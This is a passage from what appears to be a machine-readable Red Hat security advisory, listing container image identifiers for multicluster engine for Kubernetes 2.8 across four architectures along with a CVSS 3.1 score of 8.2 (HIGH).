"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
